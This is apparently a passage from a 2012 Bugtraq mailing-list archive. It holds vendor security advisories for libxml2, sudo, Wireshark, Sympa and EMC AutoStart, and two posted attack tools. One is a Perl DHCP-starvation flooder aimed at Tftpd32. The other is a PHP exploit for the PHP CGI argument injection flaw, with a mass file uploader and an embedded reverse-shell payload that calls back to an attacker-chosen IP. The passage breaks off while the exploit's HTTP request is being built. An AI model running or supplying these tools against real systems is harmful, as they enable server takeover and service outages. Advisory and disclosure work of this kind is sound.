a6bda9a063c0908786d37cf3ccc4ffee mes5/x86_64/firefox-fr-10.0.4-0.1mdvmes5.2.x86_64.rpm
0d6bc328dc776c74f3ee53fbc62deb33 mes5/x86_64/firefox-fy-10.0.4-0.1mdvmes5.2.x86_64.rpm
4413cdb1172541e31e149583c39869eb mes5/x86_64/firefox-ga_IE-10.0.4-0.1mdvmes5.2.x86_64.rpm
03ebe55c3e5de4687506a6fa978866cc mes5/x86_64/firefox-gl-10.0.4-0.1mdvmes5.2.x86_64.rpm
e00f877f64a468d3074b56535b5f272d mes5/x86_64/firefox-gu_IN-10.0.4-0.1mdvmes5.2.x86_64.rpm
02250f114481f7c38f127890fd74bf11 mes5/x86_64/firefox-he-10.0.4-0.1mdvmes5.2.x86_64.rpm
178981447a8dc0a19fded1c25a619ee7 mes5/x86_64/firefox-hi-10.0.4-0.1mdvmes5.2.x86_64.rpm
67f84f481561ca2a094f65fa5ecca25a mes5/x86_64/firefox-hu-10.0.4-0.1mdvmes5.2.x86_64.rpm
54e900d106c5623ca3b748cc60d64da5 mes5/x86_64/firefox-id-10.0.4-0.1mdvmes5.2.x86_64.rpm
36c928ff015d0070af08baebf209c151 mes5/x86_64/firefox-is-10.0.4-0.1mdvmes5.2.x86_64.rpm
cc1c1b9f15e22600b98ca8b4b456833a mes5/x86_64/firefox-it-10.0.4-0.1mdvmes5.2.x86_64.rpm
edb0b276a1d25031a96f9abf1ad9a511 mes5/x86_64/firefox-ja-10.0.4-0.1mdvmes5.2.x86_64.rpm
c011f295aec053f156ac3c3714aa0d5e mes5/x86_64/firefox-ka-10.0.4-0.1mdvmes5.2.x86_64.rpm
8312aea506245303dc54696e86681b8d mes5/x86_64/firefox-kn-10.0.4-0.1mdvmes5.2.x86_64.rpm
2a988ffefd6b988a812012030e0d4d10 mes5/x86_64/firefox-ko-10.0.4-0.1mdvmes5.2.x86_64.rpm
dc39ab0f62d0520cc84a94234235ca11 mes5/x86_64/firefox-ku-10.0.4-0.1mdvmes5.2.x86_64.rpm
30774bca94992d88644ddad3785fa1c7 mes5/x86_64/firefox-lt-10.0.4-0.1mdvmes5.2.x86_64.rpm
fc67b7a963fb8cb18cd892caef17df69 mes5/x86_64/firefox-lv-10.0.4-0.1mdvmes5.2.x86_64.rpm
4114f93c1a8951a445a047ce7b8b78c9 mes5/x86_64/firefox-mk-10.0.4-0.1mdvmes5.2.x86_64.rpm
93ad20b01148140463c2de67e52279a6 mes5/x86_64/firefox-mr-10.0.4-0.1mdvmes5.2.x86_64.rpm
2ae391524ed24ad727598f5e5d57d535 mes5/x86_64/firefox-nb_NO-10.0.4-0.1mdvmes5.2.x86_64.rpm
45ccf6143fce18549e19acd9af08b2ce mes5/x86_64/firefox-nl-10.0.4-0.1mdvmes5.2.x86_64.rpm
a983bde2fd2fccc985b9ec94304849eb mes5/x86_64/firefox-nn_NO-10.0.4-0.1mdvmes5.2.x86_64.rpm
6e4fc5cfa7087bdee36f4ad531a460d2 mes5/x86_64/firefox-oc-10.0.4-0.1mdvmes5.2.x86_64.rpm
610510a745dca777b915baa9f9fc1839 mes5/x86_64/firefox-pa_IN-10.0.4-0.1mdvmes5.2.x86_64.rpm
3d1cfd9dc0ea64666e5b74838fe8baae mes5/x86_64/firefox-pl-10.0.4-0.1mdvmes5.2.x86_64.rpm
9711952a5b20821b43214f50d4117bfd mes5/x86_64/firefox-pt_BR-10.0.4-0.1mdvmes5.2.x86_64.rpm
0081ebeac7e2b33f68e18656353c8ec5 mes5/x86_64/firefox-pt_PT-10.0.4-0.1mdvmes5.2.x86_64.rpm
76649e0ca0bc3e04ab05b207f76afef5 mes5/x86_64/firefox-ro-10.0.4-0.1mdvmes5.2.x86_64.rpm
88b591294728d5ccc16a95514f506a18 mes5/x86_64/firefox-ru-10.0.4-0.1mdvmes5.2.x86_64.rpm
f94710f67887628e5445635884d8177f mes5/x86_64/firefox-si-10.0.4-0.1mdvmes5.2.x86_64.rpm
cccca986e16c4606364c5632b5e155ad mes5/x86_64/firefox-sk-10.0.4-0.1mdvmes5.2.x86_64.rpm
af6d6a0875198e2c4644a58f35360b6a mes5/x86_64/firefox-sl-10.0.4-0.1mdvmes5.2.x86_64.rpm
2892de558bb26ddf6dd54ee41d4fab4a mes5/x86_64/firefox-sq-10.0.4-0.1mdvmes5.2.x86_64.rpm
f9964fd7159176c06bfaa738d9c40b22 mes5/x86_64/firefox-sr-10.0.4-0.1mdvmes5.2.x86_64.rpm
1c4866b21a43f4ff2431cc06792262e0 mes5/x86_64/firefox-sv_SE-10.0.4-0.1mdvmes5.2.x86_64.rpm
7f622fd303551c606e6fa7d50c854184 mes5/x86_64/firefox-te-10.0.4-0.1mdvmes5.2.x86_64.rpm
1eedad05b14fbabc3e7290e92d4a48eb mes5/x86_64/firefox-th-10.0.4-0.1mdvmes5.2.x86_64.rpm
d1149e50d5329f8cd40859b1f7677d64 mes5/x86_64/firefox-tr-10.0.4-0.1mdvmes5.2.x86_64.rpm
85c659d6d503f4a18d60b2f3a68203ed mes5/x86_64/firefox-uk-10.0.4-0.1mdvmes5.2.x86_64.rpm
3a5a6799cce49930f7263ffebfa89b60 mes5/x86_64/firefox-zh_CN-10.0.4-0.1mdvmes5.2.x86_64.rpm
3e000a956e364becab89006a451862c7 mes5/x86_64/firefox-zh_TW-10.0.4-0.1mdvmes5.2.x86_64.rpm
9574c63a42f95318a1d93f756612396e mes5/x86_64/icedtea-web-1.1.5-0.1mdvmes5.2.x86_64.rpm
aecf70a7766eaf61e4ed42d059144569 mes5/x86_64/icedtea-web-javadoc-1.1.5-0.1mdvmes5.2.x86_64.rpm
3ef5b5b1a5618061c3f3a52c2548a3ca mes5/x86_64/lib64iw29-29-3.1mnb2.x86_64.rpm
b1654a4badb379c481291e538c96f4b6 mes5/x86_64/lib64iw29-devel-29-3.1mnb2.x86_64.rpm
2743fbc604ba116cf998077158593393 mes5/x86_64/lib64vpx0-0.9.7-0.2mdvmes5.2.x86_64.rpm
5250078fd1ecbcde1a8ee22876d4ead2 mes5/x86_64/lib64vpx-devel-0.9.7-0.2mdvmes5.2.x86_64.rpm
806d4a550abfefc37b2b9c0dee9f5031 mes5/x86_64/lib64xulrunner10.0.4-10.0.4-0.1mdvmes5.2.x86_64.rpm
5a6fe261614c225ecc006d6660bcd4ad mes5/x86_64/lib64xulrunner-devel-10.0.4-0.1mdvmes5.2.x86_64.rpm
1d04326581fe942201dd7cb415e4188d mes5/x86_64/libvpx-utils-0.9.7-0.2mdvmes5.2.x86_64.rpm
123d68df17b3c0e3bc226cb989d82e07 mes5/x86_64/python-cython-0.15-0.1mdvmes5.2.x86_64.rpm
758a5f09cce66dabd0991668da246d34 mes5/x86_64/wireless-tools-29-3.1mnb2.x86_64.rpm
9a6854a6f373d31db322ebe645900c54 mes5/x86_64/xulrunner-10.0.4-0.1mdvmes5.2.x86_64.rpm
fa368599864fdbdb114a4b16eb1873e3 mes5/x86_64/yasm-1.1.0-0.1mdvmes5.2.x86_64.rpm
3c64b6f6f8477bba975279301717d662 mes5/x86_64/yasm-devel-1.1.0-0.1mdvmes5.2.x86_64.rpm
7e03d96c771110bc6e686a33bb93c14b mes5/x86_64/yasm-python-1.1.0-0.1mdvmes5.2.x86_64.rpm
cab2fb3795af9ee2b730ab4609ff5d38 mes5/SRPMS/firefox-10.0.4-0.1mdvmes5.2.src.rpm
bd3fbc028e30d73714793c5fb08f8609 mes5/SRPMS/firefox-l10n-10.0.4-0.1mdvmes5.2.src.rpm
2522a91d944b8156c3ddb82fccc25539 mes5/SRPMS/icedtea-web-1.1.5-0.1mdvmes5.2.src.rpm
78481843cb9aa5279b0975d75242e809 mes5/SRPMS/libvpx-0.9.7-0.2mdvmes5.2.src.rpm
6d47b4c4cd98073ed9435bae941dd665 mes5/SRPMS/python-cython-0.15-0.1mdvmes5.2.src.rpm
34c2cc5a16145dfcc969c0224bffdae4 mes5/SRPMS/wireless-tools-29-3.1mnb2.src.rpm
e4f47ab68daf56f0a376ed5de58219cb mes5/SRPMS/xulrunner-10.0.4-0.1mdvmes5.2.src.rpm
38698452301ff1bd0eb5fb221a9d35d2 mes5/SRPMS/yasm-1.1.0-0.1mdvmes5.2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iD8DBQFPvh54mqjQ0CJFipgRAh1pAKCIKPTFajKHsqpt7dKyLmwTGSeHNgCg6w+I
ljs6Z5jE2CsfxsacA9/iaQQ=
=S92/
-----END PGP SIGNATURE-----
</pre>security< at >mandriva.com2012-05-24T14:48:00[SECURITY] [DSA 2479-1] libxml2 security update
http://permalink.gmane.org/gmane.comp.security.bugtraq/49745
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2479-1 security< at >debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
May 23, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : libxml2
Vulnerability : off-by-one
Problem type : remote
Debian-specific: no
CVE ID : CVE-2011-3102
Jueri Aedla discovered an off-by-one in libxml2, which could result in
the execution of arbitrary code.
For the stable distribution (squeeze), this problem has been fixed in
version 2.7.8.dfsg-2+squeeze4.
For the unstable distribution (sid), this problem has been fixed in
version 2.7.8.dfsg-9.1.
We recommend that you upgrade your libxml2 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAk+9OesACgkQXm3vHE4uylpB8gCfamsExmrt7o3LVviFZm2UP6Lx
QY4AnjsL0TRs1Z1P6RUIxV1F+Cg1Xp6a
=JAT9
-----END PGP SIGNATURE-----
</pre>Moritz Muehlenhoff2012-05-23T19:39:41[SECURITY] [DSA 2478-1] sudo security update
http://permalink.gmane.org/gmane.comp.security.bugtraq/49744
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2478-1 security< at >debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
May 23, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : sudo
Vulnerability : parsing error
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-2337
It was discovered that sudo misparsed network masks used in Host and
Host_List stanzas. This allowed the execution of commands on hosts,
where the user would not be allowed to run the specified command.
For the stable distribution (squeeze), this problem has been fixed in
version 1.7.4p4-2.squeeze.3.
For the unstable distribution (sid), this problem will be fixed soon.
We recommend that you upgrade your sudo packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAk+9OUMACgkQXm3vHE4uylrvIwCgtw2WtmYMmDjledpPsJGJFuyK
LP4AoNhim5wwymY9wnB8egwHXNlLLoRs
=ZP4O
-----END PGP SIGNATURE-----
</pre>Moritz Muehlenhoff2012-05-23T19:30:06[ MDVSA-2012:080 ] wireshark
http://permalink.gmane.org/gmane.comp.security.bugtraq/49743
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2012:080
http://www.mandriva.com/security/
_______________________________________________________________________
Package : wireshark
Date : May 23, 2012
Affected: 2011.
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities was found and corrected in Wireshark:
It may be possible to make Wireshark hang for long or indefinite
periods by injecting a malformed packet onto the wire or by convincing
someone to read a malformed packet trace file.
It may be possible to make Wireshark crash by injecting a malformed
packet onto the wire or by convincing someone to read a malformed
packet trace file.
This advisory provides the latest version of Wireshark (1.6.8) which
is not vulnerable to these issues.
_______________________________________________________________________
References:
http://www.wireshark.org/security/wnpa-sec-2012-08.html
http://www.wireshark.org/security/wnpa-sec-2012-09.html
http://www.wireshark.org/security/wnpa-sec-2012-10.html
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2011:
16a577c0711df7fc568696402109d6b4 2011/i586/dumpcap-1.6.8-0.1-mdv2011.0.i586.rpm
eada57c1d6f02e7ebf14fbb3789c5bbe 2011/i586/libwireshark1-1.6.8-0.1-mdv2011.0.i586.rpm
e9e98acba88c6ee3ab1d2e51536463aa 2011/i586/libwireshark-devel-1.6.8-0.1-mdv2011.0.i586.rpm
8017f3883e54db24eeee1e0f7b3c820f 2011/i586/rawshark-1.6.8-0.1-mdv2011.0.i586.rpm
bc33e60ea854669c81652090880c430b 2011/i586/tshark-1.6.8-0.1-mdv2011.0.i586.rpm
52cc8b37b569f8bc31800eacf347a7bd 2011/i586/wireshark-1.6.8-0.1-mdv2011.0.i586.rpm
b8cd1dca05b43e22accf8cd4a1517946 2011/i586/wireshark-tools-1.6.8-0.1-mdv2011.0.i586.rpm
c7678d090d491738155aa4bb6ae2b09d 2011/SRPMS/wireshark-1.6.8-0.1.src.rpm
Mandriva Linux 2011/X86_64:
25b79e5781f78e7c7a0f239406ad3a5a 2011/x86_64/dumpcap-1.6.8-0.1-mdv2011.0.x86_64.rpm
851832cf2439b688a491620ec43318ce 2011/x86_64/lib64wireshark1-1.6.8-0.1-mdv2011.0.x86_64.rpm
6c659fbff4840bc333d90e4d72a656eb 2011/x86_64/lib64wireshark-devel-1.6.8-0.1-mdv2011.0.x86_64.rpm
9b37711290f16de47b594397de980256 2011/x86_64/rawshark-1.6.8-0.1-mdv2011.0.x86_64.rpm
2aa4ab2ba5d5b4f914b91b7d0e608c15 2011/x86_64/tshark-1.6.8-0.1-mdv2011.0.x86_64.rpm
86cdbf15b98aaacb3d42bb43dfdf2c8f 2011/x86_64/wireshark-1.6.8-0.1-mdv2011.0.x86_64.rpm
d72665f272867ca3d4af106c1a751f91 2011/x86_64/wireshark-tools-1.6.8-0.1-mdv2011.0.x86_64.rpm
c7678d090d491738155aa4bb6ae2b09d 2011/SRPMS/wireshark-1.6.8-0.1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iD8DBQFPvM7pmqjQ0CJFipgRAgddAJ9vTgXP+6YXzxHaP3OflVdGXI5O6ACeKc+9
Q9lNj2Y7agvEy1+p9wOy+Nw=
=BGJY
-----END PGP SIGNATURE-----
</pre>security< at >mandriva.com2012-05-23T14:54:00ESA-2012-020: EMC AutoStart Multiple Buffer Overflow Vulnerabilities
http://permalink.gmane.org/gmane.comp.security.bugtraq/49742
<pre>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ESA-2012-020: EMC AutoStart Multiple Buffer Overflow Vulnerabilities.
EMC Identifier: ESA-2012-020
CVE Identifier: CVE-2012-0409
Severity Rating: CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Affected products:
EMC AutoStart 5.3.x
EMC AutoStart 5.4.x
Summary:
EMC AutoStart contains multiple buffer overflow vulnerabilities which can be exploited to potentially cause a denial of service, or possibly, execute arbitrary code within the context of the affected application.
Details:
Security flaws were detected in AutoStart where malicious packets could be sent to agents to cause buffer overflow. Message could be modified to send values, which could then be used in performing arithmetic operations which in turn is used to allocate memory. Memory corruption resulting from such allocations can be exploited to gain remote code execution, cause crashes or repeated restarting of AutoStart agents affecting availability of agents.
Resolution:
The following EMC AutoStart product contains resolution to these issues:
EMC AutoStart 5.4.3
EMC strongly recommends all customers upgrade at the earliest opportunity. Note: Customers on 5.3.x will have to first upgrade to 5.4.0 and then upgrade to 5.4.3 version.
Link to Remedies:
Registered EMC customers can download software from Powerlink. For EMC AutoStart Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads A-B > AutoStart
Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045.
Credits:
EMC would like to thank gwslabs.com working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting these issues.
For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.
Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.
EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.
EMC Product Security Response Center
Security_Alert< at >EMC.com
http://www.emc.com/contact-us/contact/product-security-response-center.htm
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Cygwin)
iEYEARECAAYFAk+74EkACgkQtjd2rKp+ALzkpgCfd5wk0N3xxzpKGLoGu3i+S1W6
+FEAoLqXVLWGNlh5wbh5D158LdMiwDQj
=7/u8
-----END PGP SIGNATURE-----
</pre>Security_Alert< at >emc.com2012-05-22T18:55:33Tftpd32 DHCP Server Denial Of Service Vulnerability
http://permalink.gmane.org/gmane.comp.security.bugtraq/49736
<pre>Title: Tftpd32 DHCP Server Denial Of Service Vulnerability
Software : Tftpd32
Software Version : v4.00
Vendor: http://tftpd32.jounin.net/
Vulnerability Published : 2012-05-21
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)
Bug Description :
Tftpd32 is a free tftp and dhcp server for windows, freeware tftp server.
The tftpd32's dhcp server does not identify whether the real source mac address of dhcp discover packet is the same as client hardware address in payload of
dhcp discover packet, so that attacker can makes evil dhcp discover packets to cram dhcp client list of the dhcp server, and then no one can gain ip address
from the dhcp server.
Solution :
Like the other dhcp server, the tftpd32's dhcp server can drop the dhcp discover packet when it was detected the different between source mac address of dhcp
discover packet and client hardware address in payload of dhcp discover packet.
Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
$a=1;
while(1){
print "\Request Number : $a\n";
$mac=int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).
int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9));
$socket = IO::Socket::INET->new( Proto => 'udp',
Broadcast => 1,
LocalPort => 68,
PeerAddr =>'255.255.255.255',
PeerPort => 67,
) || die "Unable to create socket: $< at >\n";
$discover = Net::DHCP::Packet->new(
xid => int rand(0xFFFFFFFF),
Chaddr => $mac,
DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(),
DHO_VENDOR_CLASS_IDENTIFIER() => 'MyVendorClassID',
DHO_DHCP_PARAMETER_REQUEST_LIST() => '1 2 6 12 15 28 67');
$discover->addOptionRaw( 61, pack('H*',$mac));
print "Sending DISCOVER to 255.255.255.255:67\n";
$socket->send( $discover->serialize() ) or die "Unable to send Discover:$!\n";
$socket->close();
sleep(3);
$a++;
}
exit(1);
-----------------------------------------------------------
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang< at >connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
</pre>demonalex< at >163.com2012-05-21T14:05:37[Announcement] CHMag's Issue 28, May 2012 Released
http://permalink.gmane.org/gmane.comp.security.bugtraq/49735
<pre>Dear All,
Here we are with our 28th issue of ClubHack Magazine.
This issue covers following articles:-
0x00 Tech Gyan - Steganography over converted channels
0x01 Tool Gyan - Kautilya
0x02 Mom's Guide - HTTPS (Hyper Text Transfer Protocol Secure)
0x03 Legal Gyan - Section 66C - Punishment for identity theft
0x04 Code Gyan - Dont Get Injected Fix Your Code
0x05 Poster - "Look both side before crossing one way track"
Check http://chmag.in/ for articles.
PDF version can be download from:- http://chmag.in/issue/may2012.pdf
Send us your feedback, articles at info< at >chmag.in
Regards,
Team CHMag
http://chmag.in
</pre>abhijeet< at >chmag.in2012-05-21T05:57:04[SECURITY] [DSA 2477-1] sympa security update
http://permalink.gmane.org/gmane.comp.security.bugtraq/49734
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2477-1 security< at >debian.org
http://www.debian.org/security/ Florian Weimer
May 20, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : sympa
Vulnerability : authorization bypass
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-2352
Debian Bug :
Several vulnerabilities have been discovered in Sympa, a mailing list
manager, that allow to skip the scenario-based authorization
mechanisms. This vulnerability allows to display the archives
management page, and download and delete the list archives by
unauthorized users.
For the stable distribution (squeeze), this problem has been fixed in
version 6.0.1+dfsg-4+squeeze1.
For the testing distribution (wheezy), this problem will be fixed
soon.
For the unstable distribution (sid), this problem has been fixed in
version 6.1.11~dfsg-2.
We recommend that you upgrade your sympa packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iQEcBAEBAgAGBQJPuT+EAAoJEL97/wQC1SS+vxAH/jYCNKyrlOKvMj61ZCc+bxxH
X/kgdQEGgqw70pQYnlxM81hZr1YdK0KgncTiNqa0R9iN3SrVDgYNGJNGOZSxAE+M
zGqduwkeh8QRXpwORb11DKqYIAPxVYvKnJwxHv/SzFskh9Lm4ppX1vdpVZqpDNpd
8GB2xlgqjb1SKy7YYmGaGIZ6mVMqzG4+bKuix7xIiAkFhu5loQ7mnSaWlgFjeMre
tdy0Gz56rfYfuwcpC0qdEn9tfVUWBVYALG5ZgWt2i1XeMN7dNAu3FRAZvNNmxqMt
YEft+TnXdfre34Vd68kszShRlVaqEqjjtYdAY2pq4Prttqg/vKXGWg139QfJEjE=
=LMTp
-----END PGP SIGNATURE-----
</pre>Florian Weimer2012-05-20T18:54:00PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
http://permalink.gmane.org/gmane.comp.security.bugtraq/49733
<pre><?php
######################################### www.bugreport.ir
########################################
#
# Title: PHP CGI Argument Injection Remote Exploit
V0.3 - PHP Version
# Vendor: http://www.php.net
# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2
# Exploitation: Remote
# Original Advisory:
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm
# CVE: CVE-2012-1823
# Coded By: Mostafa Azizi (admin[< at >]0-Day[dot]net)
###################################################################################################
/* This tool may be used for legal purposes only. Users take full
responsibility for any actions performed using this tool.
The author accepts no liability for damage caused by this tool. If
these terms are not acceptable to you, then do not use this tool.*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);
echo'<html>
<head>
<title>PHP CGI Argument Injection Remote Exploit</title>
</head>
<p align="center"><font size="4" color="#5E767E">PHP CGI Argument
Injection</font></p>
<p align="center"><font size="3" color="#4E8975">Coded by: Mostafa
Azizi (admin[< at >]0-Day[dot]net)</font></p>
<body bgcolor="#00000">
<table align="center" border="5">
<tr>
<th><p align="center"><font size="4" color="#8BB381">Mass File
Uploader</font></p>
</th>
<th></th>
<th><p align="center"><font size="4" color="#8BB381">Reverse
Shell</font></p>
</th>
</tr>
<tr>
<td><form name="form1" action="'.$SERVER[PHP_SELF].'"
enctype="multipart/form-data" method="post">
</br>
<p></font><font color="#FFF8C6" >Please specify a file to
scan: </font></br><input type="file" name="listfile"
size="40"><font color="#FF0000"> * </font>
<p></font><font color="#FFF8C6" >Please specify a file to
upload: </font></br><input type="file" name="datafile"
size="40"><font color="#FF0000"> * </font>
<p><font color="#FFF8C6" > specify a port (default is 80):
</font></br><input name="port" size="20"><span
class="Stile5"></span></p>
<p><font color="#FFF8C6" > Proxy (ip:port):
</font></br><input name="proxy" size="20"><span
class="Stile5"></span></p>
<p align="center"> <span class="Stile5"><font
color="#FF0000">* </font><font color="white" >fields are
required</font></font></span></p>
</br>
<p align="center"><input type="submit" value="Start Attack"
name="Submit"></p>
</form> </td>
<td></td>
<td><form name="form1" action="'.$SERVER[PHP_SELF].'"
enctype="multipart/form-data" method="post">
</br>
<p></font><font color="#FFF8C6" > hostname (ex:
www.sitename.com):</font></br><input name="host" size="20"> <span
class="Stile5"></span></p>
<p></font><font color="#FFF8C6" > Your IP (ex:
173.194.35.169 ): </font></br><input name="lip" size="20">
<span class="Stile5"></span></p>
<p><font color="#FFF8C6" > Your Port (ex:
80):</font></br><input name="lport" size="20"> <span
class="Stile5"></span></p>
</br></br>
<p align="center"> <span class="Stile5"><font
color="#FF0000">All </font><font color="white" >fields are
required</font></font></span></p>
</br>
<p align="center"><input type="submit" value="Start Attack"
name="Submit2"></p>
</form> </td>
</tr>
</table>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
</td>
</tr>
</tbody>
</table>
</body></html>';
$host = $_POST['host'];
$lip = $_POST['lip'];
$lport = $_POST['lport'];
$port = $_POST['port'];
$proxy = $_POST['proxy'];
$list = file($_FILES['listfile']['tmp_name']);
$file =
base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name'])));
$shell = "gzinflate(base64_decode(\"$file\"))";
if (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '')
{
/*pentestmonkey's php-reverse-shell.
Limitations: proc_open and stream_set_blocking require PHP version
4.3+, or 5+ */
/* Connect Back */
$payload = "<?php set_time_limit (0); \$VERSION = \"1.0\"; \$ip =
'$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;
\$error_a = null; \$shell = 'uname -a; w; id; /bin/sh -i'; \$daemon =
0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid =
pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\");
exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) {
printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else {
printit(\"WARNING: Failed to daemonise. This is quite common and not
fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port,
\$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\");
exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 =>
array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process =
proc_open(\$shell, \$descriptorspec, \$pipes);if
(!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\");
exit(1);}stream_set_blocking(\$pipes[0],
0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2],
0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened
reverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) {
printit(\"ERROR: Shell connection terminated\"); break;} if
(feof(\$pipes[1])) {printit(\"ERROR: Shell process
terminated\");break;}\$read_a = array(\$sock, \$pipes[1],
\$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a,
\$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug)
printit(\"SOCK READ\");\$input = fread(\$sock,
\$chunk_size);if(\$debug) printit(\"SOCK:
\$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1],
\$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =
fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT:
\$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2],
\$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =
fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR:
\$input\");fwrite(\$sock,
\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}}
?>";
$packet = "POST
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
